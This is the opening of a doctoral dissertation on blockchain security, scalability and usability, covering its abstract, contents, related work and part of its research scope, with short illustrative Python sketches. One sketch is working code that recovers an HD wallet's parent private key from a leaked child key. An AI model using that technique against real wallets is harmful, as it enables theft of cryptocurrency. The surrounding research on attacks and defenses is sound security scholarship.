ADDRESSING SECURITY, SCALABILITY, AND USABILITY CHALLENGES OF
       BLOCKCHAIN INTEGRATION WITH THE SMART WORLD
                                    By
                              Nikolay Ivanov
                            A DISSERTATION
                                Submitted to
                        Michigan State University
                in partial fulfillment of the requirements
                             for the degree of
               Computer Science—Doctor of Philosophy
                                   2023


                                             ABSTRACT
    In recent decades, we have witnessed a convergence of multiple technologies into the inte-
grated ever-evolving Smart World ecosystem. The ongoing evolution of the Smart World is shaped
by cross-technological integration, as well as the adoption of new technologies into the ecosys-
tem. Particularly, academia and industry envision blockchain technology as one of the major new
additions to the Smart World. However, the adoption of blockchain technology is impeded by
three major practical challenges: security, scalability, and usability. This dissertation aims at ad-
dressing these three challenges by focusing on revealing new blockchain attacks, facilitating threat
mitigation in smart contracts, and introducing new trust-free applications of blockchain technol-
ogy. First, this dissertation addresses some security challenges of blockchain largely overlooked
in existing research. We discovered six zero-day social engineering attacks in Ethereum smart
contracts and propose measures to address them. Furthermore, we introduce a new attack against
hardware crypto wallets, confirmed by the manufacturers of the wallets, which evades security
verification by the user. Second, the dissertation elaborates on defending smart contracts against attacks.
We design a comprehensive five-dimensional classification taxonomy of smart contract defense
tools and classify 133 existing threat mitigation solutions using our taxonomy. Next, we introduce
a new smart contract security testing approach called transaction encapsulation, and implement a
transaction testing tool, which reveals the actual outcomes (either benign or malicious) of Ethereum
transactions. Third, the dissertation introduces novel practical blockchain applications that exhibit
increased security, privacy, and user control compared to other distributed solutions. We propose a
framework that uses a single Ethereum smart contract for enabling high-performance scalable smart
contracts on the cloud. Finally, the dissertation introduces a solution that uses Ethereum smart con-
tracts for leveraging decentralized networks of WiFi hotspots with cross-domain authentication and
automated QoS enforcement. We implemented and thoroughly evaluated all the proposed attacks,
defenses, and frameworks, thereby confirming the real-world applicability of our work. The
dissertation concludes with an outlook on our ongoing and future efforts to further address the practical
challenges associated with the integration of blockchain into the Smart World ecosystem.


Copyright by
NIKOLAY IVANOV
2023


To Anya, Mark, and Erik for their love and support.


                                     ACKNOWLEDGMENTS
    I would like to express my heartfelt gratitude towards my advisor, Dr. Qiben Yan, for being my
mentor and research partner since the first day I joined his lab; his patience, wisdom, and devotion
to students’ success are truly inspiring. Thank you, Dr. Yan, for believing in me and empowering
me to believe in myself!
    I am thankful to Dr. Li Xiao for helping me navigate the intricacies of my Ph.D. program,
serving in my Qualifying and Guidance committees, offering multiple opportunities for academic
growth, and helping me with fellowship and faculty job applications. I am thankful to Dr. Matt
Mutka for his service in my Guidance committee, thoughtful feedback on my research, and helping
me in my faculty job applications. I am thankful to Dr. Jian Ren for his service in my Guidance
committee and important feedback on my research from the engineering perspective.
    I am thankful to my past and present colleagues from THINK Lab and SEIT Lab — Dr. Mohan-
nad Alhanahnah, Boyan Hu, Qi Xia, Qicheng Lin, Jianzhi Lou, Hanqing Guo, Guangjing Wang,
Bocheng Chen, Yuanda Wang, Ce Zhou, Anurag Kompalli, Jon Gorman, Max Danley, Eric Ranes,
and Simon Harmata.
    I am thankful to the external research collaborators and mentors that I had the honor to work
with: Dr. Yunhao Liu (Tsinghua University), Chenning Li (Massachusetts Institute of Technology),
Dr. Qingyang Wang (Louisiana State University), Dr. Ting Chen (University of Electronic Science
and Technology of China), Dr. Xiapu Luo (The Hong Kong Polytechnic University), and Zhiyuan
Sun (King’s College London). I am grateful to many faculty members from Southwest Minnesota
State University, University of Nebraska—Lincoln, and Michigan State University for helping me
navigate academia: Dr. Shushuang Man, Dr. Daniel Kaiser, Prof. Kourosh Mortezapour, Dr. Don
Robertson, Dr. Teresa Henning, Dr. Lori Baker, Dr. Tom Williford, Dr. Thomas Dilley, Dr. Vaughn
Gehle, Dr. Huang Mu-wan, Dr. Wije Wijesiri, Dr. Massimiliano Pierobon, Dr. Zhichao Cao, Dr.
Charles Ofria, Dr. Arun Ross, Dr. Abdol-Hossein Esfahanian, and Dr. Charles Owen.
    Most importantly, I am thankful to my wife Anya, my sons, Mark and Erik, and my mother
Julia — for their love, support, patience, and believing in me.


                                  TABLE OF CONTENTS
CHAPTER 1: INTRODUCTION
  1.1: Related Work
  1.2: Research Scope
  1.3: Organization
CHAPTER 2: SOCIAL ENGINEERING IN ETHEREUM SMART CONTRACTS
  2.1: Introduction
  2.2: Background
  2.3: Threat Model
  2.4: Social Engineering Attacks
  2.5: Case Study of Real-world Smart Contracts
  2.6: Evaluation and Analysis
  2.7: Security Recommendations
  2.8: Chapter Summary
CHAPTER 3: ATTACKING HARDWARE WALLETS
  3.1: Introduction
  3.2: EthClipper Attack Design and Analysis
  3.3: Implementation and Evaluation
  3.4: Security Recommendations and Defense
  3.5: Related Work
  3.6: Chapter Summary
CHAPTER 4: TAXONOMY OF DEFENSE SOLUTIONS FOR SMART CONTRACTS
  4.1: Introduction
  4.2: Prior Surveys
  4.3: Methodology
  4.4: Threat Mitigation Classification
  4.5: Design Workflows of Threat Mitigation Methods
  4.6: Vulnerability Coverage
  4.7: Trends and Perspectives
  4.8: Chapter Summary
CHAPTER 5: CONTEXT-AWARE USER-CENTERED TRANSACTION TESTING
  5.1: Introduction
  5.2: Background
  5.3: Motivating Example
  5.4: Preliminaries
  5.5: TxT: Transaction Testing Framework
  5.6: Implementation and Evaluation
  5.7: Limitations and Discussion
  5.8: Chapter Summary
CHAPTER 6: SMART CONTRACTS ON THE CLOUD
  6.1: Introduction
  6.2: Comparison with SOTA
  6.3: System Design
  6.4: Scalability Analysis
  6.5: Security Analysis
  6.6: Implementation and Evaluation
  6.7: Chapter Summary
CHAPTER 7: DECENTRALIZED NETWORK OF WI-FI HOTSPOTS
  7.1: Introduction
  7.2: Background and Key Insights
  7.3: The SmartWiFi System
  7.4: Security Analysis
  7.5: Implementation
  7.6: Evaluation
  7.7: Chapter Summary
CHAPTER 8: CONCLUSION
  8.1: Summary of Contributions
  8.2: Limitations and Discussion
  8.3: Lessons Learned
  8.4: Future Work
BIBLIOGRAPHY
APPENDIX


CHAPTER 1: INTRODUCTION
The world is experiencing the emergence and rapid growth of various information and engineering
technologies, including, but not limited to: Internet of Things (IoT), distributed systems, mobile
computing, artificial intelligence, autonomous and semi-autonomous vehicles, space technology,
digital finance, smart health care, big data, wireless communication, smart agriculture, Industry
4.0 [181], and smart cities, to name a few. Evidently, these technologies not only appear and
evolve individually, but also converge into an integrated ecosystem: the ever-evolving
Smart World [143].
    The ongoing evolution of the Smart World is manifested by increasing cross-technological
integration as well as the adoption of new technologies into the ecosystem [195]. Particularly,
academia and industry envision blockchain technology as one of the major new additions to the
Smart World [81,82,164,190,238,251,259,300,306]. Blockchain technology makes it possible to
implement and automatically enforce fine-tuned communication and authorization protocols encoded
in smart contracts, which eliminate by design such events as data falsification, lost records,
repudiation, and untraceable sources. Multiple studies demonstrate [128,253,254,257] that the
complexity and size of the trusted code adversely affect the security of a system. To avoid negative
consequences caused by the growing complexity of scaling computer systems, security design solutions
have been proposed based on blockchain technology. While public blockchains are predominantly
used for cryptocurrencies and decentralized tokens, permissioned blockchains are used by
businesses and governments, as they allow multiple parties, who do not necessarily trust one another,
to establish a shared digital ecosystem with a set of predetermined, automatically enforced policies.
According to Deloitte’s 2019 Global Blockchain Survey [129, 155] encompassing 1,386 senior
executives, 53% of companies worth $500 million or more place blockchain integration among their
top five most critical priorities. Adopted by multiple businesses and governments, blockchain
technology helps contain the entropy of complex systems, especially those involving data flows
and transactions between multiple independent organizations. To facilitate the integration of the
blockchain technology into existing IT infrastructure, a number of ready-to-use platforms, such as
Hyperledger [53], have been developed.
                     Table 1.1: Overview of the scope of this dissertation.

                                                                                      Challenges Addressed
Part                     Chapter    Related Publication†                              SECURITY  SCALABILITY  USABILITY

PART I: ATTACKS          Chapter 2  N. Ivanov, J. Lou, T. Chen, J. Li, Q. Yan            ●          ○            ○
                                    Targeting the Weakest Link: Social Engineering
                                    Attacks in Ethereum Smart Contracts
                                    ACM ASIA CCS 2021

                         Chapter 3  N. Ivanov, Q. Yan                                    ●          ○            ◐
                                    EthClipper: A Clipboard Meddling Attack on
                                    Hardware Wallets with Address Verif. Evasion
                                    IEEE CNS 2021

PART II: DEFENSE         Chapter 4  N. Ivanov, C. Li, Z. Sun, Z. Cao, X. Luo, Q. Yan     ●          ○            ◐
                                    Security Threat Mitigation For
                                    Smart Contracts: A Survey
                                    To appear at ACM Computing Surveys (CSUR)

                         Chapter 5  N. Ivanov, A. Kompalli, Q. Yan                       ●          ◐            ●
                                    TxT: Real-time Transaction Encapsulation
                                    for Ethereum Smart Contracts
                                    IEEE TIFS 2023

PART III: APPLICATIONS   Chapter 6  N. Ivanov, Q. Yan, Q. Wang                           ○          ●            ◐
                                    Blockumulus: A Scalable Framework for
                                    Smart Contracts on the Cloud
                                    IEEE ICDCS 2021

                         Chapter 7  N. Ivanov, J. Lou, Q. Yan                            ◐          ●            ●
                                    SmartWiFi: Universal and Secure Smart
                                    Contract-Enabled WiFi Hotspot
                                    EAI SecureComm 2020

   ● = primary focus; ◐ = partial focus; ○ = not addressed.
   † The author of this dissertation (N. Ivanov) is the main contributor to all these papers,
   and the primary research advisor of all these publications is Dr. Qiben Yan (Q. Yan).
    Unfortunately, the integration of blockchain technology into the Smart World ecosystem
faces three major practical challenges: security [185, 309], scalability [179, 308], and usability [121,
213]. In this dissertation, we aim at addressing multiple aspects of the above triad of challenges
largely overlooked by current studies. Since the majority of our solutions simultaneously target
some subsets of the three challenges, this dissertation organizes the solutions based on their core
approach rather than the challenges they intend to address, as summarized in Table 1.1. Specifically,
we identify three major approaches described in this dissertation: revealing attacks, facilitating de-
fense, and designing novel blockchain applications. We further outline the plan for future work, in
which we continue addressing the security, scalability, and usability issues that impede the practical
adoption of blockchain.
1.1: Related Work
This section summarizes the most influential pieces of existing literature related to the research in
this dissertation, subdivided into five major categories: social engineering and phishing, security
of hardware wallets, smart contract defense, blockchain scalability improvements, and wireless
hotspot networks. Each category summarizes state-of-the-art research followed by a brief discus-
sion of the contribution of this dissertation.
1.1.1: Social Engineering and Phishing
The study of social engineering attacks in Ethereum is limited to honeypots — deceptive smart
contracts targeting users who attempt to exploit known vulnerabilities of smart contracts. Torres
et al. [270] present a taxonomy of honeypots, while Zhou et al. [309] later discover 51 previously
undetected honeypots. Although Ethereum honeypots are a subclass of social engineering
attacks, these contracts are harmless for ordinary users, as their potential victims are opportunistic
malicious players.
    Social engineering attacks are known outside of the blockchain domain. Fu et al. [124] present a
methodology for defending against such attacks, and develop a Unicode character similarity list and
attack detection tool, IDN-SecuChecker. Holgers et al. [150] conduct a measurement study of IDN
homograph attacks, which shows their real-world impact. Email/URL phishing and Ethereum so-
cial engineering attacks both target human cognitive biases. Phishing attacks have been thoroughly
studied in recent years [102, 149, 151, 218, 219, 266, 273]. However, the unique characteristics of
smart contracts, such as open execution, fee-charging transactions, and non-interactive properties,
make the design of their social engineering attacks significantly different from traditional phishing
attacks.
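As an illustration of the homograph problem mentioned above, the following minimal Python sketch
flags labels that mix letters from more than one Unicode script. It is a simple heuristic written
for this text, not the IDN-SecuChecker tool; the function names and the example labels are
hypothetical.

```python
import unicodedata


def scripts_in(label):
    """Return the script names of all letters in the label.

    The script is approximated by the first word of the Unicode character
    name, e.g. "LATIN SMALL LETTER A" -> "LATIN".
    """
    found = set()
    for ch in label:
        if ch.isalpha():
            found.add(unicodedata.name(ch).split()[0])
    return found


def looks_like_homograph(label):
    """Heuristic: a label that mixes several scripts may imitate another label."""
    return len(scripts_in(label)) > 1


def main():
    genuine = "paypal"
    spoofed = "p\u0430ypal"  # U+0430 is CYRILLIC SMALL LETTER A
    for label in (genuine, spoofed):
        print(ascii(label), sorted(scripts_in(label)), looks_like_homograph(label))


if __name__ == "__main__":
    main()
```

A mixed-script check of this kind catches only one family of look-alike strings; visually similar
characters within a single script would require a similarity list such as the one described in [124].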
Contribution of this Dissertation: The research described in this dissertation is the first to sys-
tematically study social engineering techniques in Ethereum smart contracts. Specifically, this
dissertation highlights a largely overlooked class of social engineering attacks in Ethereum smart
contracts. These attacks exploit human cognitive biases as new attack vectors. We identified
these biases and developed six zero-day social engineering attacks. By embedding most of these
attacks into existing popular tokens, we demonstrated that the attacks have the potential to victim-
ize a large group of normal users. Moreover, the attacks remain dormant during testing and only
activate after a production deployment.
1.1.2: Security of Hardware Wallets
Guri et al. [138] demonstrate a technique that allows an attacker to exfiltrate private keys from
a hardware wallet by installing malware directly on the wallet’s firmware. Gutoski et al. [139]
show that the hierarchical deterministic (HD) wallet design, used in all popular hardware wallets,
makes it possible to reveal all the private keys in the hierarchy if only one of the private keys is
leaked; this research further proposes a new HD wallet design that avoids such key co-dependency.
Several works in wireless sensing [184] demonstrate the ability to steal passcodes from personal
devices, possibly including hardware wallets. The above adversarial scenarios, however, assume
that either the attacker has physical access to the hardware wallet, or there is a partial leak of
wallet credentials. Datko et al. [104] demonstrate how the firmware of some hardware wallets
can be attacked to steal the user PIN code. San Pedro et al. [246] explore side-channel attacks
that extract PIN codes and private keys from the Trezor One hardware wallet. Although the
vulnerability was promptly patched by the manufacturer, it demonstrates that the hardware and
firmware components of hardware wallets can also be attacked. Gkaniatsou et al. [131] show how
the low-level local communication protocol between the client software and the hardware wallet
can be used for side-channel attacks.
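The key co-dependency of HD wallets noted above can be made concrete with a small sketch. It
assumes BIP32-style non-hardened derivation, in which a child private key equals the parent private
key plus a tweak computed from public data, and it additionally assumes that the attacker knows the
parent public key and chain code; neither assumption is spelled out in the text above. The helper
names are hypothetical, and rare edge cases of the real specification are ignored.

```python
import hashlib
import hmac

# secp256k1 domain parameters
P = 2**256 - 2**32 - 977
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def point_add(a, b):
    """Add two curve points; None represents the point at infinity."""
    if a is None:
        return b
    if b is None:
        return a
    (x1, y1), (x2, y2) = a, b
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if a == b:
        slope = 3 * x1 * x1 * pow(2 * y1 % P, -1, P) % P
    else:
        slope = (y2 - y1) * pow((x2 - x1) % P, -1, P) % P
    x3 = (slope * slope - x1 - x2) % P
    return x3, (slope * (x1 - x3) - y1) % P


def scalar_mult(k, point=G):
    """Double-and-add scalar multiplication."""
    result = None
    while k:
        if k & 1:
            result = point_add(result, point)
        point = point_add(point, point)
        k >>= 1
    return result


def compressed_pubkey(priv):
    """Serialize the public key of priv in 33-byte compressed form."""
    x, y = scalar_mult(priv)
    return bytes([2 + (y & 1)]) + x.to_bytes(32, "big")


def tweak(parent_pub, chain_code, index):
    """Left half of HMAC-SHA512 over public data only (non-hardened index)."""
    data = parent_pub + index.to_bytes(4, "big")
    digest = hmac.new(chain_code, data, hashlib.sha512).digest()
    return int.from_bytes(digest[:32], "big")


def derive_child_priv(parent_priv, chain_code, index):
    """Child private key = parent private key + tweak (mod N)."""
    return (parent_priv + tweak(compressed_pubkey(parent_priv), chain_code, index)) % N


def recover_parent_priv(child_priv, parent_pub, chain_code, index):
    """Attacker's view: subtract the publicly computable tweak."""
    return (child_priv - tweak(parent_pub, chain_code, index)) % N


def main():
    parent_priv = int.from_bytes(hashlib.sha256(b"demo parent key").digest(), "big") % N
    chain_code = hashlib.sha256(b"demo chain code").digest()
    leaked_child = derive_child_priv(parent_priv, chain_code, 7)
    recovered = recover_parent_priv(
        leaked_child, compressed_pubkey(parent_priv), chain_code, 7)
    print("parent key recovered:", recovered == parent_priv)


if __name__ == "__main__":
    main()
```

Once the parent private key is known, every sibling key derived in the same non-hardened way
follows, which is why a single leaked key can expose a whole branch of the hierarchy.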
Contribution of this Dissertation: This dissertation proposes a new hybrid EthClipper attack,
which zeroes in on the adversarial actions that real-world attackers have been using successfully
for decades, i.e., malware infestation of user computers and social engineering. We demonstrated
that it is possible to compromise the air-gapped security of a hardware wallet and fool its owner
into confirming a malicious transaction, even without jeopardizing the integrity of the wallet itself.
Our EthClipper attack, which is confirmed to be potentially dangerous by the manufacturers of
three leading hardware wallets, not only falsifies the input to the hardware wallet, but also
crafts the address in a way that circumvents the transaction verification procedure. Our
evaluation confirms that the attack can be carried out with a limited budget on retail equipment.
1.1.3: Smart Contract Defense
Code-based defense tools use source code, bytecode and/or ABI maps for finding bugs and vulner-
abilities in smart contracts. One of the most popular code-based approaches is symbolic execution,
represented by Mythril [215], Oyente [200], and Maian [223]. SmarTest [260] uses a language-
based model for guiding symbolic execution and generating malicious transaction sequences. Static
analyzers and formal verifiers, such as Securify [271], EthBMC [122], VerX [230], and Vandal [76],
attempt to extract semantics and other facts from the code to find violations of safety
patterns. Many static analysis tools zero in on specific security issues. For example, ZEUS [168],
Osiris [269], and VeriSmart [261] focus on arithmetic bugs; ECFChecker [137], Sereum [240], and
SeRIF [83] address reentrancy; TokenScope [96] targets security issues of ERC-20 tokens. How-
ever, the major drawback of code-based defense approaches is the probabilistic nature of the result,
which incurs non-negligible false positives/negatives.
    Smart contract testers generate and execute transactions to unveil vulnerabilities or
semantic violations. Manual testing methods include tools like Waffle [7] and Solidity
Coverage [6]. In order to enhance the ability of the test tools to reveal vulnerabilities, a number
of smart contract fuzzing methods have been proposed, including Harvey [291], Confuzzius [119],
ContractFuzzer [163], and sFuzz [221]. These testing methods try to find transaction parameters that would
confirm the safety of a smart contract or reveal a vulnerability. However, the search space for
the candidate parameters is usually too large to exhaust all the possible values (the path explosion
problem); as a result, the testing methods only use some sample sets of parameters or heuristically
determined combinations of parameters — resulting in overlooked vulnerabilities.
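To illustrate why sampling can overlook a vulnerability, the sketch below fuzzes a toy function
whose faulty behavior is triggered by a single 256-bit input. The function, the trigger value, and
the trial count are hypothetical and serve only to show the size of the input space; the sketch does
not reproduce any of the fuzzers cited above.

```python
import random
from fractions import Fraction

UINT256_MAX = 2**256 - 1
MAGIC_AMOUNT = 0xDEADBEEF  # hypothetical input that triggers the bug


def triggers_bug(amount):
    """Toy stand-in for a contract function with one narrow faulty input."""
    return amount == MAGIC_AMOUNT


def random_fuzz(trials, seed=0):
    """Return True if uniform random sampling of uint256 inputs hits the bug."""
    rng = random.Random(seed)
    return any(triggers_bug(rng.randint(0, UINT256_MAX)) for _ in range(trials))


def hit_probability_bound(trials):
    """Upper bound on the chance that `trials` uniform samples hit one value."""
    return Fraction(trials, UINT256_MAX + 1)


def main():
    trials = 100_000
    print("bug found by random sampling:", random_fuzz(trials))
    print("upper bound on hit probability:", float(hit_probability_bound(trials)))
    print("bug found by direct test:", triggers_bug(MAGIC_AMOUNT))


if __name__ == "__main__":
    main()
```

Practical fuzzers narrow the search with feedback and heuristics, but the same limitation applies
whenever the triggering inputs are rare relative to the space being sampled.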
    Unlike code-based defense tools, which statically scrutinize source code or bytecode of smart
contracts, the transaction-based defense tools analyze historical transactions stored in the blockchain,
or intercept the incoming transactions in real time. TxSpector [299] and EthScope [289] deliver
frameworks for retrospective vulnerability search using Ethereum transactions. SODA [94] and
Ægis [117] are tools for online interception of malicious transactions. Qin et al. [235] describe a
transaction replay scheme, but it is only used to demonstrate a front-running attack, not for defense.
Evidently, none of the existing transaction-based methods provide a definitive result to ensure the
transaction safety.
Contribution of this Dissertation: This dissertation surveys the full spectrum of smart contract
threat mitigation solutions. We presented a general taxonomy for the classification of
such solutions, which applies to today’s methods and is suitable for future methods, even if new
paradigms, blockchain platforms, or vulnerabilities appear. Using this taxonomy, we classified
133 existing smart contract threat mitigation solutions. We identified eight distinct core defense
methods employed by the existing solutions and developed synthesized workflows of these core
methods. We studied the ability of the existing smart contract threat mitigation solutions to address
the known vulnerabilities. We conducted an evidence-based evolutionary study of smart contract
threat mitigation solutions to outline trends and perspectives. To further benefit the community of
smart contract security researchers, users, and developers, we deployed an open-source, regularly
updated online registry for smart contract threat mitigation. Furthermore, in this dissertation, we
proposed a transaction-based dynamic interceptor, called TxT, that deterministically verifies the
safety of transactions, or refuses to give an answer in case of uncertainty. In contrast with previous
defense solutions, TxT provides the user with an actual outcome of a transaction applied to the
current state of blockchain. Instead of predicting future transaction parameters, TxT tests the exact
transactions the user is going to submit. Moreover, in addition to replaying the transaction, TxT
also addresses the notorious TOCTOU challenge by assessing the expiration and replicability of
the test transaction.
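The idea of testing the exact transaction against the current state, and refusing to answer when
the state has changed since the test, can be sketched with a toy model. The code below is not the
TxT implementation: the dictionary-based state, the token_transfer contract, and the verdict strings
are all hypothetical simplifications.

```python
import copy
import hashlib
import json


def fingerprint(state):
    """Hash of the full state, used to detect changes between test and use."""
    return hashlib.sha256(json.dumps(state, sort_keys=True).encode()).hexdigest()


def token_transfer(state, sender, recipient, amount):
    """Toy contract call with a hidden fee switch controlled by the contract."""
    balances = state["balances"]
    if balances.get(sender, 0) < amount:
        raise ValueError("insufficient balance")
    fee = amount // 2 if state["fee_enabled"] else 0
    balances[sender] -= amount
    balances[recipient] = balances.get(recipient, 0) + amount - fee


def dry_run(state, tx, expectation):
    """Apply tx to a copy of the state and compare the outcome to the expectation."""
    sandbox = copy.deepcopy(state)
    try:
        tx(sandbox)
    except Exception:
        return "UNSAFE", fingerprint(state)
    verdict = "SAFE" if expectation(state, sandbox) else "UNSAFE"
    return verdict, fingerprint(state)


def submit_if_unchanged(state, tx, verdict, tested_fingerprint):
    """Submit only if the tested outcome still applies to the current state."""
    if verdict != "SAFE":
        return "REJECTED"
    if fingerprint(state) != tested_fingerprint:
        return "UNKNOWN"  # state changed after the test: refuse to answer
    tx(state)
    return "SUBMITTED"


def main():
    state = {"fee_enabled": False, "balances": {"alice": 100, "bob": 0}}
    tx = lambda s: token_transfer(s, "alice", "bob", 10)
    expect = lambda before, after: (
        after["balances"]["bob"] - before["balances"]["bob"] == 10)
    verdict, tested = dry_run(state, tx, expect)
    print("test verdict:", verdict)
    state["fee_enabled"] = True  # the contract owner flips the switch after the test
    print("submission result:", submit_if_unchanged(state, tx, verdict, tested))


if __name__ == "__main__":
    main()
```

Hashing the entire state is far stricter than necessary and is used here only to keep the sketch
short; it shows the check-then-use gap, not how expiration or replicability is assessed in practice.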
1.1.4: Blockchain Scalability Improvements
There have been various solutions proposed for improving the performance and scalability of
blockchain, which we subdivide into five major groups: 1) off-chain execution, 2) side-chaining and
cross-chaining, 3) sharding and alternative consensus, 4) network optimizations and payment channels,
and 5) alternative blockchain architectures.
Off-Chain Execution: Off-chain execution is an arrangement in which some portions of smart
contract computation are performed outside of the blockchain to improve performance and reduce
costs. Ekiden [98] addresses the lack of confidentiality and poor performance of blockchain by
securing an off-chain computation via trusted execution environment (TEE) technology. Despite
significant performance improvement, the operation of Ekiden relies on the availability of crowd-
sourced consensus and compute nodes. The security of the system is founded on the assumption
that the participants have Sybil-resistant identities (i.e., they cannot create multiple fake accounts).
The requirement for a participation deposit to prevent Sybil attacks may not only be ineffective
against wealthy attackers, but may also reduce the incentive for community participation. Another
off-chain execution solution, ZEXE, is proposed for abundant private off-chain computation [71].
Unlike Ekiden, ZEXE does not require hardware TEE enclaves, and therefore can be used in a
wider scope of platforms. However, this system focuses on improving the computation scalabil-
ity and reducing communication overhead, whereas the scalability issue in storage and transaction
throughput remains unaddressed.
Side-Chaining and Cross-Chaining: Side-chaining is an arrangement in which some smart con-
tract execution is outsourced to a different blockchain, while cross-chaining is a way for inde-
pendent blockchains to share resources and use common assets. Plasma [231] attempts to reduce
fees and improve performance of Ethereum blockchain by linking a smart contract to a tree of
child blockchains. Although Plasma distributes the computation load of the master smart contract
among multiple chains, the transaction throughput remains a likely bottleneck, and there is no solid
evidence of significant improvement of storage capacity. A popular cross-chaining solution called
Polkadot [287] improves transaction throughput by creating a network of interoperable blockchains.
However, the solution does not directly address the storage and compute capacity for smart con-
tracts.
Sharding and Alternative Consensus: The concept of sharding involves selecting a subset of
nodes to serve as temporary representatives in a decentralized consensus, which curbs the perfor-
mance degradation associated with gossip broadcasts in large blockchain networks. Algorand [130]
proposes a blockchain with improved performance using a sharding scheme based on a verifiable
random function. Algorand delivers a significant increase in transaction throughput compared to
classic public blockchains, but its operation relies on a set of assumptions that can be refuted by
massive denial-of-service or Sybil attacks. Specifically, Algorand assumes that at least 95% of all
honest users must be able to send messages to other honest users, and the overall share of honest
participants must be greater than 2/3. Another solution with sharding-based consensus is Rapid-
chain [298], which delivers high transaction throughput. However, Rapidchain is not scalable in
terms of data storage and compute capacity.
     Some alternative consensus models attempt to replace a compute-heavy PoW algorithm with
lightweight alternatives, such as proof-of-stake (PoS), in which the voting power is determined by
the amount of funds in possession of a node. Ouroboros [173] is a provably secure blockchain with
PoS consensus. Unfortunately, existing alternative consensuses fail to address the full spectrum
of scalability problems, and they introduce significant fairness challenges, such as “monetary
hegemony”. Yu et al. [297] propose a lightweight consensus protocol, OHIE, to improve blockchain
scalability by leveraging a parallel execution of the Nakamoto consensus. Despite the improvement
in transaction throughput and available bandwidth, the scalability of storage and computation is not
considered in OHIE.
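The stake-based voting described above can be illustrated with a minimal Python sketch. It is not the Ouroboros protocol or any other cited system; the node names, the stake values, and the helpers `voting_power` and `pick_proposer` are hypothetical and serve only to show how voting power follows the amount of funds a node holds.

```python
import random


def voting_power(stakes):
    """Return each node's share of the total stake (its voting power)."""
    total = sum(stakes.values())
    if total <= 0:
        raise ValueError("total stake must be positive")
    return {node: amount / total for node, amount in stakes.items()}


def pick_proposer(stakes, rng):
    """Draw one node with probability proportional to its stake."""
    nodes = list(stakes)
    weights = [stakes[node] for node in nodes]
    return rng.choices(nodes, weights=weights, k=1)[0]


# Hypothetical stake distribution in arbitrary units.
stakes = {"alice": 70, "bob": 25, "carol": 5}
power = voting_power(stakes)

rng = random.Random(2023)  # fixed seed so repeated runs give the same draws
draws = [pick_proposer(stakes, rng) for _ in range(10_000)]
for node in stakes:
    # Print the nominal voting power next to the observed selection frequency.
    print(node, power[node], draws.count(node) / len(draws))
```

In this toy setting the node holding most of the funds is selected most often, which is the intuition behind the fairness concern mentioned above.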
Network Optimizations and Payment Channels: Off-chain payment channels have been proposed
to improve performance and reduce fees associated with financial transactions. The Lightning
Network protocol [232] enables the creation of off-chain micropayment channels. Perun [110] is
another payment channel proposal that improves routing of transactions. Although off-chain
payment channels have been adopted by real-world applications, they cannot serve as alternatives
to public blockchains because of their specific focus (only for payment) and the necessity to
orchestrate a network of crowdsourced participants.
Alternative Architectures: Researchers have been re-thinking the architecture of blockchain in
order to improve performance and scalability. SPECTRE [262] proposes a reorganization of a
traditional Nakamoto blockchain into a directed acyclic graph (DAG). Although it improves the
speed of transactions, it could not be used for general-purpose smart contracts that may require
abundant data storage and heavy computation.
Contribution of this Dissertation: In this dissertation, we proposed the first scalable framework,
called Blockumulus, for deploying decentralized smart contracts on the cloud — to address the
blockchain scalability limitations on three dimensions: transaction throughput, data storage, and
computation. Blockumulus employs a novel overlay consensus which delivers decentralization to
smart contracts in a centralized cloud instead of random P2P network nodes. Concretely, a consor-
tium of centralized cloud computing nodes can host a permissionless smart contract environment
where clients can control the execution of their customized contracts and manage the data stored
by these contracts. Our evaluation on Microsoft Azure shows that Blockumulus can execute tens
of thousands of transactions within a minute, which is on par with the average throughput of world-
wide credit card transactions. By integrating the decentralization of smart contracts and the scal-
ability feature of the cloud, Blockumulus takes the first step towards high-performance data-rich
smart contracts with high transaction throughput.
1.1.5: Wireless Hotspot Networks
WiFi hotspots often operate as networks to improve coverage, mobility, authentication,
and payment. Industry and academia proposed a number of approaches for WiFi hotspot networks,
which we subdivide into two general categories: traditional solutions and blockchain solutions.
Traditional WiFi Hotspot Solutions: Current non-blockchain WiFi hotspot solutions are repre-
sented either by manual setups, or cloud-managed subscription-based proprietary products, such
as Cisco Meraki [8], Aruba [9], Ruckus [14], and similar solutions. However, none of these ap-
proaches simultaneously addresses all of the following objectives: a) enhancing hotspot security
against malicious routers and clients; b) providing universal authentication and billing; and c) mak-
ing payment based on service quality.
Blockchain Solutions: OPPay [252] is a peer-to-peer opportunistic data service system. However,
the OPPay-based solution is impractical for a WiFi hotspot, as it incurs high fees and does not
offer QoS measurement for sustaining a reliable service. A commercial project WinQ [15] has
been in development since 2016. Advertised as a blockchain-enabled mobile WiFi hotspot, the
solution was intended to operate on its own blockchain called QLC Chain [13]. We installed both
the Android and iOS apps to discover that the system is activated only on testnet blockchain, which
was practically unavailable.
Dynamic Speed Evaluation: QDASH was proposed for dynamic speed measurement [210], which
is based on the assumption that the user traffic is available to the client connection handler. This
requirement makes QDASH and its derivatives unsuitable for use by SmartWiFi clients. Xylo-
phone [292] observes the behavior of TCP ACK and RST packets for speed measurement. Al-
though the technique accurately estimates the bandwidth, it requires extended permissions for the
client to capture TCP packets, which are usually not available on Android and iOS without root-
ing/jailbreaking.
Contribution of this Dissertation: In this dissertation, we proposed SmartWiFi, a smart contract-
enabled WiFi hotspot system, which provides universal accessibility, cross-domain authentication,
association of QoS and payment, and security enhancement. SmartWiFi utilizes a novel crypto-
graphic mechanism, Hansa, to establish connection. Hansa provides low-cost off-chain execution
by restricting otherwise unacceptable smart contract fees, and significantly reduces delays associ-
ated with smart contract interaction. To validate the feasibility of SmartWiFi system, we designed
and implemented a SmartWiFi prototype using an Ethereum smart contract. The experimental re-
sults show that SmartWiFi exhibits low operational delays, minimum communication overhead, and
small blockchain fees. We demonstrated that SmartWiFi is a scalable, secure, and efficient WiFi
hotspot solution, which can be easily deployed in a variety of systems with minimal intervention.
1.2: Research Scope
1.2.1: Attacks on Smart Contracts
Ethereum holds multiple billions of U.S. dollars in the form of Ether cryptocurrency and ERC-20
tokens, with millions of deployed smart contracts algorithmically operating these funds. Unsur-
prisingly, the security of Ethereum smart contracts has been under rigorous scrutiny. In recent
years, numerous defense tools have been developed to detect different types of smart contract code
